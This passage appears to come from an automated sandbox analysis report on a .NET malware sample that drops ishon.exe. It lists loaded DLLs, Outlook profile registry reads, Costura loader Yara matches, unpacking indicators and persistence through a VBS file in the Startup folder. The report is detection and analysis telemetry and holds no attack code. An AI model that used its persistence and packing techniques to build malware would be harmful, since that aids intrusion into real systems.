                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: LAQfpnQvPQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: LAQfpnQvPQ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: LAQfpnQvPQ.exe, 00000000.00000002.2241775942.0000000006A10000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: LAQfpnQvPQ.exe, 00000000.00000002.2241775942.0000000006A10000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 0.2.LAQfpnQvPQ.exe.7700000.7.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.LAQfpnQvPQ.exe.7700000.7.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.LAQfpnQvPQ.exe.7700000.7.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.LAQfpnQvPQ.exe.7700000.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.LAQfpnQvPQ.exe.7700000.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.LAQfpnQvPQ.exe.43c5c20.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.LAQfpnQvPQ.exe.43c5c20.3.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.LAQfpnQvPQ.exe.43c5c20.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.LAQfpnQvPQ.exe.43c5c20.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.LAQfpnQvPQ.exe.43c5c20.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Yara detected Costura Assembly Loader
                      Source: Yara matchFile source: 5.2.ishon.exe.43511c0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LAQfpnQvPQ.exe.76a0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LAQfpnQvPQ.exe.42f11c0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.2515782521.0000000004351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2244743417.00000000076A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2219471547.000000000320E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2504335246.000000000326E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: LAQfpnQvPQ.exe PID: 5144, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ishon.exe PID: 2888, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_017EDA98 pushad ; ret 0_2_017EDA99
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_069F7658 pushfd ; ret 0_2_069F7659
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_069F3E66 push BA056CC2h; retf 0_2_069F3E6B
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_069FB74D push es; iretd 0_2_069FB75C
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_069F8510 pushfd ; retf 0_2_069F8519
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_069F823E push es; iretd 0_2_069F8240
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_069FCBD6 push es; iretd 0_2_069FCBDC
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_075F455B push eax; ret 0_2_075F4949
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_075F4560 push eax; ret 0_2_075F4949
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_075F3C11 push esp; retf 0_2_075F3C8D
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_075F3C30 push esp; retf 0_2_075F3C8D
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_0762F078 push 0C077DCBh; retf 0_2_0762F07D
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_077557A5 push FFFFFF8Bh; iretd 0_2_077557A7
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_0775578B push FFFFFF8Bh; ret 0_2_07755790
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_02D29720 push esp; ret 3_2_02D29721
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE3181 push ebx; retf 3_2_05AE3182
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_0134DA98 pushad ; ret 5_2_0134DA99
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_07481913 push eax; ret 5_2_0748191D
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_07483D33 pushfd ; retf 5_2_07483D4D
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_07483D9D push C006C4F1h; retf 5_2_07483DAD
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_07483C73 push esp; retf 5_2_07483C8D
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_074CF068 push 0C0767CBh; retf 5_2_074CF06D
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_075F578D push FFFFFF8Bh; ret 5_2_075F5790
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_075F57A4 push FFFFFF8Bh; iretd 5_2_075F57A7
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_075F2203 push cs; iretd 5_2_075F2204
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_076287A0 pushfd ; retf 5_2_076287A9
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_07623CF6 push BA0556C2h; retf 5_2_07623CFB
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_076278E8 pushfd ; ret 5_2_076278E9
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_0769C76A push ss; ret 5_2_0769C771
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeFile created: C:\Users\user\AppData\Roaming\ishon.exeJump to dropped file

                      Boot Survival

                      barindex
                      Drops VBS files to the startup folder
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbsJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbsJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
